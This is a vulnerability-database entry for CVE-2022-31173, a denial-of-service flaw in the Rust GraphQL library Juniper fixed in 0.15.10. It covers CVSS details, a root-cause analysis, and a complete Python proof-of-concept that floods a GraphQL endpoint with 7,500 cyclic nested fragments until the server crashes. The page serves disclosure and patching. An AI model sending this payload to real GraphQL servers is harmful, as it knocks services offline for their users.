7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2022-31173

GHSA ID

GHSA-4rx6-g5vg-5f3j

EPSS Score

CWE

CWE-400

Published

7/29/2022

Updated

7/24/2023

KEV Status

Technology

Rust

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2022-31173

CVE-2022-31173: Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion.

# Infinite loop example
query {
    ...a
}

fragment a on Query {
    ...b
}

fragment b on Query {
    ...a
}

POC TLDR

With max_size being the number of nested fragment generated. At max_size=7500, it should instantly raise:

However, with a lower size, you will overflow the memory after some iterations.

Reproduction steps (Juniper)

git clone https://github.com/graphql-rust/juniper.git
cd juniper

Save this POC as poc.py

import requests
import time
import json
from itertools import permutations

print('=== Fragments POC ===')

url = 'http://localhost:8080/graphql'

max_size = 7500
perms = [''.join(p) for p in permutations('abcefghijk')]
perms = perms[:max_size]

fragment_payloads = ''
for i, perm in enumerate(perms):
    next_perm = perms[i+1] if i < max_size-1 else perms[0]
    fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}'

payload = {'query':'query{\n  ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None}

headers = {
  'Content-Type': 'application/json',
}

try:
    response = requests.request('POST', url, headers=headers, json=payload)
    print(response.text)
except requests.exceptions.ConnectionError:
    print('Connection closed, POC worked.')

cargo run
[in separate shell] python3 poc.py

Credits

@Escape-Technologies

@c3b5aw @MdotTIM @karimhreda

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2022-31173

CVE-2022-31173:

7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2022-31173

GHSA ID

GHSA-4rx6-g5vg-5f3j

EPSS Score

CWE

CWE-400

Published

7/29/2022

Updated

7/24/2023

KEV Status

Technology

Rust

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
juniper	rust	< 0.15.10	0.15.10

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from recursive graph traversal implementations in validation rules that used stack-based recursion without depth limits. The commit diff shows replacements of recursive calls with heap-allocated stacks (Vec-based iteration), indicating the original functions were vulnerable to unbounded recursion. Key files modified include no_fragment_cycles.rs where the cycle detection was reimplemented to avoid recursion, and similar patterns in other validation rules. The POC demonstrates that ~7500 nested fragments cause crashes, matching typical stack size limitations in Rust.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2022-31173: Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

POC TLDR

Reproduction steps (Juniper)

Credits

CVE-2022-31173:

7.5

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

7.5

7.5

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2022-31173: Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow

GraphQL behaviour

POC TLDR

Reproduction steps (Juniper)

Credits

Technical Details

Basic Information

Basic Information

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI